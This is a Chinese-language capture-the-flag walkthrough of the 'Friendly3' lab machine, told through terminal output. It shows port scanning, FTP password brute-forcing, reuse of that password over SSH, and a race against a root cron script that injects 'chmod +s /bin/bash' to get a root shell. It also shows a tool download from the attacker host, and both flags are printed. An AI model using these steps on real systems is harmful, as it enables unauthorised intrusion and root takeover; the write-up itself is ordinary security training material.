Friendly3
信息搜集
端口扫描
rustscan -a 172.20.10.5 -- -AOpen 172.20.10.5:21
Open 172.20.10.5:22
Open 172.20.10.5:80
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack vsftpd 3.0.3
22/tcp open ssh syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey:
| 256 bc:46:3d:85:18:bf:c7:bb:14:26:9a:20:6c:d3:39:52 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFC2DVBfq6sqSsCS9Jg+TZN7bqZ4U5G/tKb5dD3M69VVHwPRuMmify8CmxFhlP33nMhZTvYSZIpjGuiPSjks5UA=
| 256 7b:13:5a:46:a5:62:33:09:24:9d:3e:67:b6:eb:3f:a1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICDxFT3mwConXgCXORTtuda6Onx3sMQgZb6CzY2tWc3l
80/tcp open http syn-ack nginx 1.22.1
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.22.1
| http-methods:
|_ Supported Methods: GET HEAD
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel目录扫描
gobuster dir -u http://172.20.10.5 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png没有扫到东西。
漏洞发现
踩点
Hi, sysadmin
I want you to know that I've just uploaded the new files into the FTP Server.
See you,
juan.爆破FTP
查看一下FTP,尝试匿名登录,我尝试了一下名字:
admin
root
ftp
anonymous
juan
sysadmin
juan.都不行,尝试爆破juan和sysadmin:
得到用户
juan
alexis查看:
┌──(kali💀kali)-[~/temp/Friendly3]
└─$ ftp 172.20.10.5
Connected to 172.20.10.5.
220 (vsFTPd 3.0.3)
Name (172.20.10.5:kali): juan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
Remote directory: /
ftp> ls -la
229 Entering Extended Passive Mode (|||51316|)
150 Here comes the directory listing.
drwxr-xr-x 14 0 0 4096 Jun 25 2023 .
drwxr-xr-x 14 0 0 4096 Jun 25 2023 ..
-rw-r--r-- 1 0 0 0 Jun 25 2023 file1
-rw-r--r-- 1 0 0 0 Jun 25 2023 file10
-rw-r--r-- 1 0 0 0 Jun 25 2023 file100
-rw-r--r-- 1 0 0 0 Jun 25 2023 file11
-rw-r--r-- 1 0 0 0 Jun 25 2023 file12
-rw-r--r-- 1 0 0 0 Jun 25 2023 file13
-rw-r--r-- 1 0 0 0 Jun 25 2023 file14
-rw-r--r-- 1 0 0 0 Jun 25 2023 file15
-rw-r--r-- 1 0 0 0 Jun 25 2023 file16
-rw-r--r-- 1 0 0 0 Jun 25 2023 file17
-rw-r--r-- 1 0 0 0 Jun 25 2023 file18
-rw-r--r-- 1 0 0 0 Jun 25 2023 file19
-rw-r--r-- 1 0 0 0 Jun 25 2023 file2
-rw-r--r-- 1 0 0 0 Jun 25 2023 file20
-rw-r--r-- 1 0 0 0 Jun 25 2023 file21
-rw-r--r-- 1 0 0 0 Jun 25 2023 file22
-rw-r--r-- 1 0 0 0 Jun 25 2023 file23
-rw-r--r-- 1 0 0 0 Jun 25 2023 file24
-rw-r--r-- 1 0 0 0 Jun 25 2023 file25
-rw-r--r-- 1 0 0 0 Jun 25 2023 file26
-rw-r--r-- 1 0 0 0 Jun 25 2023 file27
-rw-r--r-- 1 0 0 0 Jun 25 2023 file28
-rw-r--r-- 1 0 0 0 Jun 25 2023 file29
-rw-r--r-- 1 0 0 0 Jun 25 2023 file3
-rw-r--r-- 1 0 0 0 Jun 25 2023 file30
-rw-r--r-- 1 0 0 0 Jun 25 2023 file31
-rw-r--r-- 1 0 0 0 Jun 25 2023 file32
-rw-r--r-- 1 0 0 0 Jun 25 2023 file33
-rw-r--r-- 1 0 0 0 Jun 25 2023 file34
-rw-r--r-- 1 0 0 0 Jun 25 2023 file35
-rw-r--r-- 1 0 0 0 Jun 25 2023 file36
-rw-r--r-- 1 0 0 0 Jun 25 2023 file37
-rw-r--r-- 1 0 0 0 Jun 25 2023 file38
-rw-r--r-- 1 0 0 0 Jun 25 2023 file39
-rw-r--r-- 1 0 0 0 Jun 25 2023 file4
-rw-r--r-- 1 0 0 0 Jun 25 2023 file40
-rw-r--r-- 1 0 0 0 Jun 25 2023 file41
-rw-r--r-- 1 0 0 0 Jun 25 2023 file42
-rw-r--r-- 1 0 0 0 Jun 25 2023 file43
-rw-r--r-- 1 0 0 0 Jun 25 2023 file44
-rw-r--r-- 1 0 0 0 Jun 25 2023 file45
-rw-r--r-- 1 0 0 0 Jun 25 2023 file46
-rw-r--r-- 1 0 0 0 Jun 25 2023 file47
-rw-r--r-- 1 0 0 0 Jun 25 2023 file48
-rw-r--r-- 1 0 0 0 Jun 25 2023 file49
-rw-r--r-- 1 0 0 0 Jun 25 2023 file5
-rw-r--r-- 1 0 0 0 Jun 25 2023 file50
-rw-r--r-- 1 0 0 0 Jun 25 2023 file51
-rw-r--r-- 1 0 0 0 Jun 25 2023 file52
-rw-r--r-- 1 0 0 0 Jun 25 2023 file53
-rw-r--r-- 1 0 0 0 Jun 25 2023 file54
-rw-r--r-- 1 0 0 0 Jun 25 2023 file55
-rw-r--r-- 1 0 0 0 Jun 25 2023 file56
-rw-r--r-- 1 0 0 0 Jun 25 2023 file57
-rw-r--r-- 1 0 0 0 Jun 25 2023 file58
-rw-r--r-- 1 0 0 0 Jun 25 2023 file59
-rw-r--r-- 1 0 0 0 Jun 25 2023 file6
-rw-r--r-- 1 0 0 0 Jun 25 2023 file60
-rw-r--r-- 1 0 0 0 Jun 25 2023 file61
-rw-r--r-- 1 0 0 0 Jun 25 2023 file62
-rw-r--r-- 1 0 0 0 Jun 25 2023 file63
-rw-r--r-- 1 0 0 0 Jun 25 2023 file64
-rw-r--r-- 1 0 0 0 Jun 25 2023 file65
-rw-r--r-- 1 0 0 0 Jun 25 2023 file66
-rw-r--r-- 1 0 0 0 Jun 25 2023 file67
-rw-r--r-- 1 0 0 0 Jun 25 2023 file68
-rw-r--r-- 1 0 0 0 Jun 25 2023 file69
-rw-r--r-- 1 0 0 0 Jun 25 2023 file7
-rw-r--r-- 1 0 0 0 Jun 25 2023 file70
-rw-r--r-- 1 0 0 0 Jun 25 2023 file71
-rw-r--r-- 1 0 0 0 Jun 25 2023 file72
-rw-r--r-- 1 0 0 0 Jun 25 2023 file73
-rw-r--r-- 1 0 0 0 Jun 25 2023 file74
-rw-r--r-- 1 0 0 0 Jun 25 2023 file75
-rw-r--r-- 1 0 0 0 Jun 25 2023 file76
-rw-r--r-- 1 0 0 0 Jun 25 2023 file77
-rw-r--r-- 1 0 0 0 Jun 25 2023 file78
-rw-r--r-- 1 0 0 0 Jun 25 2023 file79
-rw-r--r-- 1 0 0 0 Jun 25 2023 file8
-rw-r--r-- 1 0 0 36 Jun 25 2023 file80
-rw-r--r-- 1 0 0 0 Jun 25 2023 file81
-rw-r--r-- 1 0 0 0 Jun 25 2023 file82
-rw-r--r-- 1 0 0 0 Jun 25 2023 file83
-rw-r--r-- 1 0 0 0 Jun 25 2023 file84
-rw-r--r-- 1 0 0 0 Jun 25 2023 file85
-rw-r--r-- 1 0 0 0 Jun 25 2023 file86
-rw-r--r-- 1 0 0 0 Jun 25 2023 file87
-rw-r--r-- 1 0 0 0 Jun 25 2023 file88
-rw-r--r-- 1 0 0 0 Jun 25 2023 file89
-rw-r--r-- 1 0 0 0 Jun 25 2023 file9
-rw-r--r-- 1 0 0 0 Jun 25 2023 file90
-rw-r--r-- 1 0 0 0 Jun 25 2023 file91
-rw-r--r-- 1 0 0 0 Jun 25 2023 file92
-rw-r--r-- 1 0 0 0 Jun 25 2023 file93
-rw-r--r-- 1 0 0 0 Jun 25 2023 file94
-rw-r--r-- 1 0 0 0 Jun 25 2023 file95
-rw-r--r-- 1 0 0 0 Jun 25 2023 file96
-rw-r--r-- 1 0 0 0 Jun 25 2023 file97
-rw-r--r-- 1 0 0 0 Jun 25 2023 file98
-rw-r--r-- 1 0 0 0 Jun 25 2023 file99
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold10
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold11
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold12
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold13
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold14
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold15
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold4
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold5
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold6
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold7
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold8
drwxr-xr-x 2 0 0 4096 Jun 25 2023 fold9
-rw-r--r-- 1 0 0 58 Jun 25 2023 fole32
226 Directory send OK.
ftp> get file80
local: file80 remote: file80
229 Entering Extended Passive Mode (|||21632|)
150 Opening BINARY mode data connection for file80 (36 bytes).
100% |***********************************************************************************************************| 36 0.39 KiB/s 00:00 ETA
226 Transfer complete.
36 bytes received in 00:00 (0.38 KiB/s)
ftp> get fole32
local: fole32 remote: fole32
229 Entering Extended Passive Mode (|||14269|)
150 Opening BINARY mode data connection for fole32 (58 bytes).
100% |***********************************************************************************************************| 58 92.09 KiB/s 00:00 ETA
226 Transfer complete.
58 bytes received in 00:00 (55.15 KiB/s)
ftp> get fold10
local: fold10 remote: fold10
229 Entering Extended Passive Mode (|||46237|)
550 Failed to open file.
ftp> cd fold10
250 Directory successfully changed.
ftp> ls -la
229 Entering Extended Passive Mode (|||38694|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Jun 25 2023 .
drwxr-xr-x 14 0 0 4096 Jun 25 2023 ..
-rw-r--r-- 1 0 0 163 Jun 25 2023 .test.txt
226 Directory send OK.
ftp> get .test.txt
local: .test.txt remote: .test.txt
229 Entering Extended Passive Mode (|||45645|)
150 Opening BINARY mode data connection for .test.txt (163 bytes).
100% |***********************************************************************************************************| 163 1.78 KiB/s 00:00 ETA
226 Transfer complete.
163 bytes received in 00:00 (1.77 KiB/s)
ftp> exit
221 Goodbye.┌──(kali💀kali)-[~/temp/Friendly3]
└─$ cat file80
Hi, I'm the sysadmin. I am bored...
┌──(kali💀kali)-[~/temp/Friendly3]
└─$ cat fole32
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabba
┌──(kali💀kali)-[~/temp/Friendly3]
└─$ cat .test.txt
Hi, I'am juan another time. I want you to know that I found "cookie" in a file called "zlcnffjbeq.gkg" into my home folder. I think it's from another user, IDK...什么玩意?暂时没啥用了,看来是,尝试ssh爆破,顺便试一下是否是相同密码:
看来不用爆破了,但是还是让他在后面跑吧,等下,出来辣:
提权
信息搜集
juan@friendly3:~$ ls -la
total 28
drwxr-xr-x 3 juan juan 4096 Jul 17 2023 .
drwxr-xr-x 4 root root 4096 Jun 25 2023 ..
lrwxrwxrwx 1 root root 9 Jun 25 2023 .bash_history -> /dev/null
-rw-r--r-- 1 juan juan 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 juan juan 3526 Apr 23 2023 .bashrc
drwxr-xr-x 14 root root 4096 Jun 25 2023 ftp
-rw-r--r-- 1 juan juan 807 Apr 23 2023 .profile
-r-------- 1 juan juan 33 Jul 17 2023 user.txt
juan@friendly3:~$ cat user.txt
cb40b159c8086733d57280de3f97de30
juan@friendly3:~$ find . -name zlcnffjbeq.gkg 2>/dev/null
juan@friendly3:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
ftp:x:100:108:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
juan:x:1001:1001::/home/juan:/bin/bash
messagebus:x:101:109::/nonexistent:/usr/sbin/nologin
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
blue:x:1002:1002::/home/blue:/bin/bash
juan@friendly3:~$ cd ..
juan@friendly3:/home$ ls -la
total 16
drwxr-xr-x 4 root root 4096 Jun 25 2023 .
drwxr-xr-x 18 root root 4096 Jun 25 2023 ..
drwxr-xr-x 2 blue blue 4096 Jun 25 2023 blue
drwxr-xr-x 3 juan juan 4096 Jul 17 2023 juan
juan@friendly3:/home$ cd blue
juan@friendly3:/home/blue$ ls -la
total 20
drwxr-xr-x 2 blue blue 4096 Jun 25 2023 .
drwxr-xr-x 4 root root 4096 Jun 25 2023 ..
lrwxrwxrwx 1 root root 9 Jun 25 2023 .bash_history -> /dev/null
-rw-r--r-- 1 blue blue 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 blue blue 3526 Apr 23 2023 .bashrc
-rw-r--r-- 1 blue blue 807 Apr 23 2023 .profile
juan@friendly3:/home/blue$ find / -name zlcnffjbeq.gkg 2>/dev/null
juan@friendly3:/home/blue$ find / -user blue -name *.txt 2>/dev/null
juan@friendly3:/home/blue$ find / -user juan -name *.txt 2>/dev/null
/home/juan/user.txt
juan@friendly3:/home/blue$ find / -user root -name *.txt 2>/dev/null
/home/juan/ftp/fold8/passwd.txt
/home/juan/ftp/fold10/.test.txt
/home/juan/ftp/fold5/yt.txt
/var/cache/dictionaries-common/ispell-dicts-list.txt
/usr/share/vim/vim90/doc/help.txt
/usr/share/doc/publicsuffix/examples/test_psl.txt
/usr/share/doc/openssl/fingerprints.txt
/usr/share/doc/openssl/HOWTO/keys.txt
/usr/share/doc/vsftpd/examples/VIRTUAL_USERS/logins.txt
/usr/share/doc/libdb5.3/build_signature_amd64.txt
/usr/share/doc/mount/mount.txt
/usr/share/doc/util-linux/howto-debug.txt
/usr/share/doc/util-linux/release-schedule.txt
/usr/share/doc/util-linux/howto-man-page.txt
/usr/share/doc/util-linux/col.txt
/usr/share/doc/util-linux/pg.txt
/usr/share/doc/util-linux/howto-tests.txt
/usr/share/doc/util-linux/getopt.txt
/usr/share/doc/util-linux/getopt_changelog.txt
/usr/share/doc/util-linux/cal.txt
/usr/share/doc/util-linux/hwclock.txt
/usr/share/doc/util-linux/howto-build-sys.txt
/usr/share/doc/util-linux/PAM-configuration.txt
/usr/share/doc/util-linux/howto-compilation.txt
/usr/share/doc/util-linux/mount.txt
/usr/share/doc/util-linux/deprecated.txt
/usr/share/doc/util-linux/modems-with-agetty.txt
/usr/share/doc/util-linux/blkid.txt
/usr/share/doc/util-linux/00-about-docs.txt
/usr/share/doc/busybox/syslog.conf.txt
juan@friendly3:/home/blue$ cat /home/juan/ftp/fold8/passwd.txt
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠟⠛⠛⠛⠋⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠙⠛⠛⠛⠿⠻⠿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀⠀⡀⠠⠤⠒⢂⣉⣉⣉⣑⣒⣒⠒⠒⠒⠒⠒⠒⠒⠀⠀⠐⠒⠚⠻⠿⠿⣿⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⠏⠀⠀⠀⠀⡠⠔⠉⣀⠔⠒⠉⣀⣀⠀⠀⠀⣀⡀⠈⠉⠑⠒⠒⠒⠒⠒⠈⠉⠉⠉⠁⠂⠀⠈⠙⢿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⠇⠀⠀⠀⠔⠁⠠⠖⠡⠔⠊⠀⠀⠀⠀⠀⠀⠀⠐⡄⠀⠀⠀⠀⠀⠀⡄⠀⠀⠀⠀⠉⠲⢄⠀⠀⠀⠈⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⠋⠀⠀⠀⠀⠀⠀⠀⠊⠀⢀⣀⣤⣤⣤⣤⣀⠀⠀⠀⢸⠀⠀⠀⠀⠀⠜⠀⠀⠀⠀⣀⡀⠀⠈⠃⠀⠀⠀⠸⣿⣿⣿⣿
⣿⣿⣿⣿⡿⠥⠐⠂⠀⠀⠀⠀⡄⠀⠰⢺⣿⣿⣿⣿⣿⣟⠀⠈⠐⢤⠀⠀⠀⠀⠀⠀⢀⣠⣶⣾⣯⠀⠀⠉⠂⠀⠠⠤⢄⣀⠙⢿⣿⣿
⣿⡿⠋⠡⠐⠈⣉⠭⠤⠤⢄⡀⠈⠀⠈⠁⠉⠁⡠⠀⠀⠀⠉⠐⠠⠔⠀⠀⠀⠀⠀⠲⣿⠿⠛⠛⠓⠒⠂⠀⠀⠀⠀⠀⠀⠠⡉⢢⠙⣿
⣿⠀⢀⠁⠀⠊⠀⠀⠀⠀⠀⠈⠁⠒⠂⠀⠒⠊⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⢀⣀⡠⠔⠒⠒⠂⠀⠈⠀⡇⣿
⣿⠀⢸⠀⠀⠀⢀⣀⡠⠋⠓⠤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠄⠀⠀⠀⠀⠀⠀⠈⠢⠤⡀⠀⠀⠀⠀⠀⠀⢠⠀⠀⠀⡠⠀⡇⣿
⣿⡀⠘⠀⠀⠀⠀⠀⠘⡄⠀⠀⠀⠈⠑⡦⢄⣀⠀⠀⠐⠒⠁⢸⠀⠀⠠⠒⠄⠀⠀⠀⠀⠀⢀⠇⠀⣀⡀⠀⠀⢀⢾⡆⠀⠈⡀⠎⣸⣿
⣿⣿⣄⡈⠢⠀⠀⠀⠀⠘⣶⣄⡀⠀⠀⡇⠀⠀⠈⠉⠒⠢⡤⣀⡀⠀⠀⠀⠀⠀⠐⠦⠤⠒⠁⠀⠀⠀⠀⣀⢴⠁⠀⢷⠀⠀⠀⢰⣿⣿
⣿⣿⣿⣿⣇⠂⠀⠀⠀⠀⠈⢂⠀⠈⠹⡧⣀⠀⠀⠀⠀⠀⡇⠀⠀⠉⠉⠉⢱⠒⠒⠒⠒⢖⠒⠒⠂⠙⠏⠀⠘⡀⠀⢸⠀⠀⠀⣿⣿⣿
⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠑⠄⠰⠀⠀⠁⠐⠲⣤⣴⣄⡀⠀⠀⠀⠀⢸⠀⠀⠀⠀⢸⠀⠀⠀⠀⢠⠀⣠⣷⣶⣿⠀⠀⢰⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠁⢀⠀⠀⠀⠀⠀⡙⠋⠙⠓⠲⢤⣤⣷⣤⣤⣤⣤⣾⣦⣤⣤⣶⣿⣿⣿⣿⡟⢹⠀⠀⢸⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣧⡀⠀⠀⠀⠀⠀⠀⠀⠑⠀⢄⠀⡰⠁⠀⠀⠀⠀⠀⠈⠉⠁⠈⠉⠻⠋⠉⠛⢛⠉⠉⢹⠁⢀⢇⠎⠀⠀⢸⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⣀⠈⠢⢄⡉⠂⠄⡀⠀⠈⠒⠢⠄⠀⢀⣀⣀⣰⠀⠀⠀⠀⠀⠀⠀⠀⡀⠀⢀⣎⠀⠼⠊⠀⠀⠀⠘⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⡀⠉⠢⢄⡈⠑⠢⢄⡀⠀⠀⠀⠀⠀⠀⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠁⠀⠀⢀⠀⠀⠀⠀⠀⢻⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣀⡈⠑⠢⢄⡀⠈⠑⠒⠤⠄⣀⣀⠀⠉⠉⠉⠉⠀⠀⠀⣀⡀⠤⠂⠁⠀⢀⠆⠀⠀⢸⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣦⣄⡀⠁⠉⠒⠂⠤⠤⣀⣀⣉⡉⠉⠉⠉⠉⢀⣀⣀⡠⠤⠒⠈⠀⠀⠀⠀⣸⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣤⣄⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣶⣶⣶⣤⣤⣤⣤⣀⣀⣤⣤⣤⣶⣾⣿⣿⣿⣿⣿
juan@friendly3:/home/blue$ cat /home/juan/ftp/fold5/yt.txt
Thanks to all my YT subscribers!借着信息搜集:
juan@friendly3:/home/blue$ sudo -l
-bash: sudo: command not found
juan@friendly3:/home/blue$ cd /
juan@friendly3:/$ ls -la
total 68
drwxr-xr-x 18 root root 4096 Jun 25 2023 .
drwxr-xr-x 18 root root 4096 Jun 25 2023 ..
lrwxrwxrwx 1 root root 7 Jun 25 2023 bin -> usr/bin
drwxr-xr-x 3 root root 4096 Jun 25 2023 boot
drwxr-xr-x 17 root root 3300 Apr 14 05:34 dev
drwxr-xr-x 63 root root 4096 Apr 14 05:34 etc
drwxr-xr-x 4 root root 4096 Jun 25 2023 home
lrwxrwxrwx 1 root root 29 Jun 25 2023 initrd.img -> boot/initrd.img-6.1.0-9-amd64
lrwxrwxrwx 1 root root 29 Jun 25 2023 initrd.img.old -> boot/initrd.img-6.1.0-9-amd64
lrwxrwxrwx 1 root root 7 Jun 25 2023 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Jun 25 2023 lib32 -> usr/lib32
lrwxrwxrwx 1 root root 9 Jun 25 2023 lib64 -> usr/lib64
lrwxrwxrwx 1 root root 10 Jun 25 2023 libx32 -> usr/libx32
drwx------ 2 root root 16384 Jun 25 2023 lost+found
drwxr-xr-x 3 root root 4096 Jun 25 2023 media
drwxr-xr-x 2 root root 4096 Jun 25 2023 mnt
drwxr-xr-x 2 root root 4096 Jun 25 2023 opt
dr-xr-xr-x 140 root root 0 Apr 14 05:33 proc
drwx------ 4 root root 4096 Jul 17 2023 root
drwxr-xr-x 17 root root 540 Apr 14 06:04 run
lrwxrwxrwx 1 root root 8 Jun 25 2023 sbin -> usr/sbin
drwxr-xr-x 3 root root 4096 Jun 25 2023 srv
dr-xr-xr-x 13 root root 0 Apr 14 05:33 sys
drwxrwxrwt 7 root root 4096 Apr 14 06:09 tmp
drwxr-xr-x 14 root root 4096 Jun 25 2023 usr
drwxr-xr-x 12 root root 4096 Jun 25 2023 var
lrwxrwxrwx 1 root root 26 Jun 25 2023 vmlinuz -> boot/vmlinuz-6.1.0-9-amd64
lrwxrwxrwx 1 root root 26 Jun 25 2023 vmlinuz.old -> boot/vmlinuz-6.1.0-9-amd64
juan@friendly3:/$ cat /etc/cron*
cat: /etc/cron.d: Is a directory
cat: /etc/cron.daily: Is a directory
cat: /etc/cron.hourly: Is a directory
cat: /etc/cron.monthly: Is a directory
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.daily; }
47 6 * * 7 root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.weekly; }
52 6 1 * * root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.monthly; }
#
cat: /etc/cron.weekly: Is a directory
cat: /etc/cron.yearly: Is a directory
juan@friendly3:/$ cd opt
juan@friendly3:/opt$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Jun 25 2023 .
drwxr-xr-x 18 root root 4096 Jun 25 2023 ..
-rwxr-xr-x 1 root root 190 Jun 25 2023 check_for_install.sh
juan@friendly3:/opt$ cat check_for_install.sh
#!/bin/bash
/usr/bin/curl "http://127.0.0.1/9842734723948024.bash" > /tmp/a.bash
chmod +x /tmp/a.bash
chmod +r /tmp/a.bash
chmod +w /tmp/a.bash
/bin/bash /tmp/a.bash
rm -rf /tmp/a.bash
juan@friendly3:/opt$ cd /tmp
juan@friendly3:/tmp$ wget http://172.20.10.8:8888/pspy64
-bash: wget: command not found
juan@friendly3:/tmp$ busybox wget http://172.20.10.8:8888/pspy64
Connecting to 172.20.10.8:8888 (172.20.10.8:8888)
saving to 'pspy64'
pspy64 100% |***********************************************************************| 4364k 0:00:00 ETA
'pspy64' saved
juan@friendly3:/tmp$ chmod +x pspy64
juan@friendly3:/tmp$ ./pspy64看到了一个疑似可以利用的脚本,传一个pspy64上去,看看是否是定时任务:
确实是定时任务,尝试见缝插针写个脚本利用一下:
#!/bin/sh
while true:
do
echo "chmod + s /bin/bash" >> a.bash
donejuan@friendly3:/tmp$ ./exp.sh
./exp.sh: line 1: 1:: command not foundwhat?直接执行吧。。。。。
while true;do echo 'chmod +s /bin/bash' >> a.bash;done拿到shell!!
juan@friendly3:/tmp$ ls -l /bin/bash
-rwxr-xr-x 1 root root 1265648 Apr 23 2023 /bin/bash
juan@friendly3:/tmp$ while true;do echo 'chmod +s /bin/bash' >> a.bash;done
^Cchmod +s /bin/bash
juan@friendly3:/tmp$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1265648 Apr 23 2023 /bin/bash
juan@friendly3:/tmp$ bash -p
bash-5.2# cd /root
bash-5.2# ls -la
total 40
drwx------ 4 root root 4096 Jul 17 2023 .
drwxr-xr-x 18 root root 4096 Jun 25 2023 ..
lrwxrwxrwx 1 root root 9 Jun 25 2023 .bash_history -> /dev/null
-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc
-r-xr-xr-x 1 root root 509 Jun 25 2023 interfaces.sh
-rw------- 1 root root 20 Jun 25 2023 .lesshst
drwxr-xr-x 3 root root 4096 Jun 25 2023 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
-r-------- 1 root root 33 Jul 17 2023 root.txt
-rw-r--r-- 1 root root 66 Jun 25 2023 .selected_editor
drwx------ 2 root root 4096 Jun 25 2023 .ssh
bash-5.2# cat root.txt
eb9748b67f25e6bd202e5fa25f534d51
